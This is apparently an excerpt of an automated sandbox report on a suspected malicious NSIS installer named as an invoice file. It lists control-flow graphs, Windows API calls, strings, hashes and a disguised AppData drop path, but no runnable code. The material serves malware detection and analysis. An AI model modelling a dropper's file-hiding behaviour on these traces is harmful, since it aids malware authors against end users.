                          • Instruction Fuzzy Hash: C46104B0200605BEE620BB65AE46F2B366CEF04358F41453FF941B61E2DF7DAC018A6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 392 40154a-4015bd 393 402ea1 392->393 394 4015c3-4015c7 392->394 395 402ea5 393->395 396 4016c1-4016cf 394->396 397 4017c2-401e9e call 40303e call 4065f5 394->397 398 401684-4016aa 394->398 399 4015e6-4015ee 394->399 400 4018cb-4018d4 call 40303e call 406a7c 394->400 401 40160c-40160d 394->401 402 4015ce-4015d0 394->402 403 4016ef-4016fb call 40303e SetFileAttributesW 394->403 404 4016af-4016bc call 406645 394->404 405 40182f-40184b call 40303e GetFullPathNameW 394->405 406 401711-401728 call 40303e call 406beb 394->406 407 401633-40163a SetForegroundWindow 394->407 408 4017d3-4017f6 call 40303e * 3 MoveFileW 394->408 409 4015d5-4015d6 394->409 410 401618-40162e call 403002 Sleep 394->410 411 4015f9-401607 call 4030fd call 401399 394->411 412 40189b-4018b8 call 40303e SearchPathW 394->412 413 4018de-401904 call 40303e call 406e29 394->413 414 40163f-401645 394->414 415 402eab 395->415 426 4016d1-4016d5 ShowWindow 396->426 427 4016d9-4016e0 396->427 485 401bb2-401bb6 397->485 486 401ea4-401ea8 397->486 423 402ead-402eb7 398->423 430 4015f0-4015f7 PostQuitMessage 399->430 431 4015dc-4015e1 399->431 468 4018d9 400->468 416 40160e-401613 call 405d6f 401->416 402->423 461 401701-401703 403->461 404->393 459 401857-40185d 405->459 460 40184d-401855 405->460 476 401784-40178e 406->476 477 40172a-40173f call 40661c 406->477 407->393 493 401804-401808 408->493 494 4017f8-4017ff 408->494 428 4015d7 call 405d6f 409->428 410->393 411->423 412->393 453 4018be-4018c6 412->453 479 401906-40190c call 406b40 413->479 480 40190e-401920 call 406b40 call 40657c lstrcatW 413->480 421 401671-40167f 414->421 422 401647 414->422 415->423 416->393 421->393 442 401657-40166c call 403002 422->442 443 401649-401650 422->443 426->427 427->393 446 4016e6-4016ea ShowWindow 427->446 428->431 430->431 431->423 442->393 443->442 446->393 453->395 472 40187b 459->472 473 40185f-401862 459->473 471 40187f-401883 460->471 461->393 474 401709-40170c 461->474 468->461 471->395 482 401889-401896 GetShortPathNameW 471->482 472->471 473->472 481 401864-40186c call 4065f5 473->481 474->395 489 401790-4017ab call 405d6f call 406b40 SetCurrentDirectoryW 476->489 490 4017bb-4017bd 476->490 499 401741-401745 477->499 500 401758-401759 call 405e53 477->500 502 401925-40192d call 406d63 479->502 480->502 481->460 505 40186e-401876 call 406b40 481->505 482->395 485->423 486->393 486->423 489->393 523 4017b1-4017b6 489->523 490->416 493->474 501 40180e-401816 call 4065f5 493->501 494->416 499->500 506 401747-40174e call 406522 499->506 515 40175e-401760 500->515 501->474 519 40181c-40182a call 406263 501->519 522 40192e-401931 502->522 505->472 506->500 524 401750-401751 call 405e73 506->524 520 401762-401767 515->520 521 401775-40177e 515->521 519->416 526 401774 520->526 527 401769-401772 GetFileAttributesW 520->527 521->477 528 401780 521->528 529 401933-40193d call 4065f5 522->529 530 401964-401966 522->530 523->393 537 401756 524->537 526->521 527->521 527->526 528->476 541 401950-401960 529->541 542 40193f-40194e CompareFileTime 529->542 534 401968-401969 call 406bc3 530->534 535 40196e-401989 call 406941 530->535 534->535 543 401a18-401a49 call 405d6f call 403148 535->543 544 40198f-401991 535->544 537->515 541->530 542->541 557 401a52-401a5a SetFileTime 543->557 558 401a4b-401a50 543->558 545 401993-4019df call 406b40 * 2 call 405ece call 406b40 call 406ace 544->545 546 4019fd-401a13 call 405d6f 544->546 545->522 575 4019e5-4019e8 545->575 546->395 560 401a60-401a6d FindCloseChangeNotification 557->560 558->557 558->560 560->393 562 401a73-401a76 560->562 564 401a78-401a87 call 405ece lstrcatW 562->564 565 401a89-401a8c call 405ece 562->565 570 401a91-401a9c call 406ace 564->570 565->570 570->431 576 4019f2-4019f8 575->576 577 4019ea-4019ed 575->577 576->415 577->428
                          APIs
                          • PostQuitMessage.USER32(00000000), ref: 004015F1
                          • Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
                          • SetForegroundWindow.USER32 ref: 00401634
                          • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                          • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                          • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                          • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente,00000000,000000E6,0040A8E8), ref: 004017A3
                          • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                          • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,0040A8E8,00000000,000000E3,0040A8E8,?,?,00000000,00000000), ref: 00401843
                          • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                          • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                          • lstrcatW.KERNEL32(00000000,00000000), ref: 00401920
                          • CompareFileTime.KERNEL32(-00000014,00000000,#32770,#32770,00000000,00000000,#32770,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                          • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,#32770,40000000,00000001,#32770,00000000), ref: 00401A5A
                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401A61
                          • lstrcatW.KERNEL32(#32770,00000000), ref: 00401A82
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: File$PathWindow$AttributesNameShowTimelstrcat$ChangeCloseCompareCurrentDirectoryFindForegroundFullMessageMoveNotificationPostQuitSearchShortSleep
                          • String ID: #32770$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente
                          • API String ID: 2574475933-1841771533
                          • Opcode ID: 43fd908afd629ab3123e27e66c0f7f6d67c4280901ad26f6c9d0b681eabf664a
                          • Instruction ID: 54f580788a1c981ee2aa4d03f04bbd7a59fcfe8367069513e2cd8bad69e9103c
                          • Opcode Fuzzy Hash: 43fd908afd629ab3123e27e66c0f7f6d67c4280901ad26f6c9d0b681eabf664a
                          • Instruction Fuzzy Hash: 47D1E971204301BBC720AF26CD85E2B76A8EF85758F14463FF952B22E1D77CD902966E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 578 4033c8-403415 GetTickCount GetModuleFileNameW call 406941 581 403421-403451 call 406b40 call 406d36 call 406b40 GetFileSize 578->581 582 403417-40341c 578->582 590 403457 581->590 591 40354d-40355c call 403364 581->591 583 403620-403627 582->583 592 40345b-403481 call 40311b 590->592 596 403562-403564 591->596 597 40361b 591->597 601 403613-40361a call 403364 592->601 602 403487-40348e 592->602 599 403595-4035c5 GlobalAlloc call 403131 call 403148 596->599 600 403566-40357e call 403131 call 40696e 596->600 597->583 599->597 628 4035c7-4035d9 599->628 620 403583-403585 600->620 601->597 606 403490-4034a9 call 4066da 602->606 607 40350f-403512 602->607 610 40351c-403522 606->610 624 4034ab-4034b3 606->624 609 403514-40351b call 403364 607->609 607->610 609->610 616 403524-403533 call 406e62 610->616 617 403537-40353f 610->617 616->617 617->592 625 403545-403549 617->625 620->597 626 40358b-40358f 620->626 624->610 629 4034b5-4034bd 624->629 625->591 626->597 626->599 630 4035e1-4035e4 628->630 631 4035db 628->631 629->610 632 4034bf-4034c7 629->632 634 4035e7-4035ef 630->634 631->630 632->610 633 4034c9-4034d1 632->633 633->610 636 4034d3-4034f2 633->636 634->634 635 4035f1-40360a SetFilePointer call 4066da 634->635 640 40360f-403611 635->640 636->597 637 4034f8-4034fe 636->637 637->625 639 403500-403509 637->639 639->610 641 40350b-40350d 639->641 640->583 641->610
                          APIs
                          • GetTickCount.KERNEL32 ref: 004033DB
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,00000400,?,?,?,?,?), ref: 004033F7
                            • Part of subcall function 00406941: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00406945
                            • Part of subcall function 00406941: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 00406965
                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00403441
                          • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 0040359B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                          • API String ID: 2803837635-2673803685
                          • Opcode ID: 4d243d38a3ad6339ee8aa80d84cc90877c13bdd790173e94ff372c5f12e29924
                          • Instruction ID: 637332c1018913c6dd7bd02a32c0650212d7fe5c483d10f810555a3d9d10852c
                          • Opcode Fuzzy Hash: 4d243d38a3ad6339ee8aa80d84cc90877c13bdd790173e94ff372c5f12e29924
                          • Instruction Fuzzy Hash: FE51F471600300BFC7219F25DD81B5B7AA8AB88729F10053FF945B72E1CB799E458B6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 642 405ece-405ed7 643 405ed9-405ee8 642->643 644 405eea-405f05 642->644 643->644 645 405f07-405f12 644->645 646 405f1c-405f23 644->646 645->646 647 405f14-405f18 645->647 648 406129-406130 646->648 649 405f29-405f2c 646->649 647->646 651 406132-406139 call 406b40 648->651 652 40613b 648->652 650 405f2d-405f3b 649->650 654 405f41-405f4c 650->654 655 406124-406128 650->655 653 40613d-406143 651->653 652->653 657 405f52-405f96 654->657 658 4060fd 654->658 655->648 662 4060a8-4060ab 657->662 663 405f9c-405fab 657->663 660 40610b 658->660 661 4060ff-406109 658->661 664 40610e 660->664 661->664 665 4060e1-4060e4 662->665 666 4060ad-4060b0 662->666 667 405fea-405fed 663->667 668 405fad-405fca call 40699d 663->668 675 406110-40611e 664->675 669 4060e6-4060ea call 405ece 665->669 670 4060ef-4060fb lstrlenW 665->670 673 4060c0-4060d7 call 406b40 666->673 674 4060b2-4060be call 406645 666->674 671 406000-406003 667->671 672 405fef-405ffb GetSystemDirectoryW 667->672 683 405fcf-405fd8 668->683 669->670 670->675 679 406013 671->679 680 406005-406011 GetWindowsDirectoryW 671->680 678 40608a 672->678 673->670 691 4060d9-4060df call 406d63 673->691 674->670 675->650 675->655 684 40608e-406093 678->684 685 406015-406031 679->685 680->678 683->684 688 405fde-405fe5 call 405ece 683->688 690 406095-406098 684->690 684->691 692 406043-406055 call 40690c 685->692 693 406033-406037 685->693 688->684 690->691 696 40609a-4060a6 lstrcatW 690->696 691->670 702 40605d-406063 692->702 699 40603f-406041 693->699 696->691 699->692 701 406086 699->701 701->678 703 406065-40607b SHGetPathFromIDListW CoTaskMemFree 702->703 704 40607d-406084 702->704 703->701 703->704 704->685 704->701
                          APIs
                          • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405FF5
                            • Part of subcall function 00406B40: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428520,NSIS Error), ref: 00406B4D
                            • Part of subcall function 00405ECE: SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406067
                            • Part of subcall function 00405ECE: CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040329B,00000000,?), ref: 00406073
                          • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,Completed,?,?,?,?,?,00000000,?,?), ref: 0040600B
                          • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0
                          • lstrlenW.KERNEL32(: Completed,Completed,?,?,?,?,?,00000000,?,?), ref: 004060F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrcpynlstrlen
                          • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 698176107-905382516
                          • Opcode ID: 10e22a83219c9469c943a0011af324ebc33233766f374aa7269788be35432e2f
                          • Instruction ID: 6592cd3e3f1effef240fd6bc508cabf4defa41d1f1dc7b29d78b8892326d4530
                          • Opcode Fuzzy Hash: 10e22a83219c9469c943a0011af324ebc33233766f374aa7269788be35432e2f
                          • Instruction Fuzzy Hash: 2461F4712442119BD720AF29CC80A3B76A4EF88314F16453FF986FB2D1DA3CD9628B5D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 769 405d6f-405d7b 770 405d81-405d94 769->770 771 405e4c-405e50 769->771 772 405da0-405db0 lstrlenW 770->772 773 405d96-405d9b call 405ece 770->773 775 405db2-405dc1 lstrlenW 772->775 776 405dd5 772->776 773->772 777 405dc7-405dd3 lstrcatW 775->777 778 405e49-405e4b 775->778 779 405dda-405ddd 776->779 777->779 778->771 780 405dec-405def 779->780 781 405ddf-405de6 SetWindowTextW 779->781 782 405df1-405e35 SendMessageW * 3 780->782 783 405e37-405e39 780->783 781->780 782->783 783->778 784 405e3b-405e41 783->784 784->778
                          APIs
                          • lstrlenW.KERNEL32(Completed,?,00000000,?,?), ref: 00405DA1
                          • lstrlenW.KERNEL32(?,Completed,?,00000000,?,?), ref: 00405DB3
                          • lstrcatW.KERNEL32(Completed,?), ref: 00405DCE
                          • SetWindowTextW.USER32(Completed,Completed), ref: 00405DE6
                          • SendMessageW.USER32(?), ref: 00405E0D
                          • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405E28
                          • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E35
                            • Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$TextWindow
                          • String ID: Completed
                          • API String ID: 1759915248-3087654605
                          • Opcode ID: df7e712f3139f74e20298386dab558d5dfe674a56e28af97f2f02655417d6691
                          • Instruction ID: 6ef3c3d0b03056325a7a2600e917b75e8747fbb93f59cfdb966a1896fefd0f42
                          • Opcode Fuzzy Hash: df7e712f3139f74e20298386dab558d5dfe674a56e28af97f2f02655417d6691
                          • Instruction Fuzzy Hash: 0E21F5726016206BC310AF55DD44A9BBBACEF84310F44043FB588B3291C77C9E018AAD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 785 403148-403181 786 403190-4031a4 call 40696e 785->786 787 403183-40318b call 403131 785->787 791 403354 786->791 792 4031aa-4031b0 786->792 787->786 793 403356 791->793 794 4032f6-4032f8 792->794 795 4031b6-4031dd GetTickCount call 407c9a 792->795 796 403357-403361 793->796 797 4032fa-4032fc 794->797 798 40333d-403352 call 40311b 794->798 800 4032ee-4032f0 795->800 806 4031e3-4031fa call 40311b 795->806 797->800 801 4032fe 797->801 798->791 798->800 800->796 805 403303-403313 call 40311b 801->805 805->791 811 403315-403325 call 406a31 805->811 806->791 812 403200-40320e 806->812 817 403327-403335 811->817 818 403339-40333b 811->818 814 403218-403234 call 406ece 812->814 820 4032f2-4032f4 814->820 821 40323a-40325a GetTickCount 814->821 817->805 822 403337 817->822 818->793 820->793 823 4032a7-4032ad 821->823 824 40325c-403265 821->824 822->800 827 4032e6-4032e8 823->827 828 4032af-4032b1 823->828 825 403267-403269 824->825 826 40326b-4032a3 MulDiv wsprintfW call 405d6f 824->826 825->823 825->826 826->823 827->800 827->806 830 4032b3-4032bc call 406a31 828->830 831 4032cb-4032d3 828->831 835 4032c1-4032c3 830->835 834 4032d7-4032de 831->834 834->814 836 4032e4 834->836 835->818 837 4032c5-4032c9 835->837 836->800 837->834
                          APIs
                          • GetTickCount.KERNEL32 ref: 004031B6
                          • GetTickCount.KERNEL32 ref: 00403245
                          • MulDiv.KERNEL32(?,00000064,?), ref: 00403275
                          • wsprintfW.USER32 ref: 00403286
                            • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CountTick$FilePointerwsprintf
                          • String ID: ... %d%%$IA
                          • API String ID: 999035486-4091959093
                          • Opcode ID: 17875f6efe9859698fff221a7ea4e726cf93f6784a417477d41227b068560121
                          • Instruction ID: 2447629bb7044e352a44cf446cd93415b8e208792db2fb3d96f352db20133979
                          • Opcode Fuzzy Hash: 17875f6efe9859698fff221a7ea4e726cf93f6784a417477d41227b068560121
                          • Instruction Fuzzy Hash: 2B517D716083419BD7109F2ADD85A2BBBE8AB84345F044A3FB855F32D1DB38DA048B5E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 838 4061c4-4061e4 GetSystemDirectoryW 839 4061e6-4061e8 838->839 840 4061fe 838->840 839->840 841 4061ea-4061f5 839->841 842 406200 840->842 841->842 843 4061f7-4061fc 841->843 844 406205-406232 wsprintfW LoadLibraryExW 842->844 843->844
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061DB
                          • wsprintfW.USER32 ref: 00406217
                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040622B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: DirectoryLibraryLoadSystemwsprintf
                          • String ID: %s%S.dll$UXTHEME$\
                          • API String ID: 2200240437-1946221925
                          • Opcode ID: a5d5e6927ba214d803f829fdb4940f3dfd8f38c35747a496afdefda45140a5fc
                          • Instruction ID: ea43e37a9a948e64b8baa80a5d9681825b49504011a49ea9ffd1815874cab989
                          • Opcode Fuzzy Hash: a5d5e6927ba214d803f829fdb4940f3dfd8f38c35747a496afdefda45140a5fc
                          • Instruction Fuzzy Hash: 4AF02B71500118A7D710B764DD0DB97366CAF04304F1044BEA647F21D1EB7C8A54CB9C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 845 406a7c-406a88 846 406a89-406abb GetTickCount GetTempFileNameW 845->846 847 406ac6 846->847 848 406abd-406abf 846->848 850 406ac8-406acb 847->850 848->846 849 406ac1-406ac4 848->849 849->850
                          APIs
                          • GetTickCount.KERNEL32 ref: 00406A98
                          • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403D09,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406AB3
                          Strings
                          • a, xrefs: 00406A91
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A81
                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A85
                          • n, xrefs: 00406A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                          • API String ID: 1716503409-3085344383
                          • Opcode ID: 6b72c1919760a7964ca0f7b7f55a239f82b127745a54a5872b51f44c84c39b11
                          • Instruction ID: 4734b79f2842bb542a52457d8b117df1871e87075b0dca9252a62959e0b75850
                          • Opcode Fuzzy Hash: 6b72c1919760a7964ca0f7b7f55a239f82b127745a54a5872b51f44c84c39b11
                          • Instruction Fuzzy Hash: 4DF0BE32700208FBEB109F95ED09BDE7B6AEF91720F11803BE901BA180E6B05A5487A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
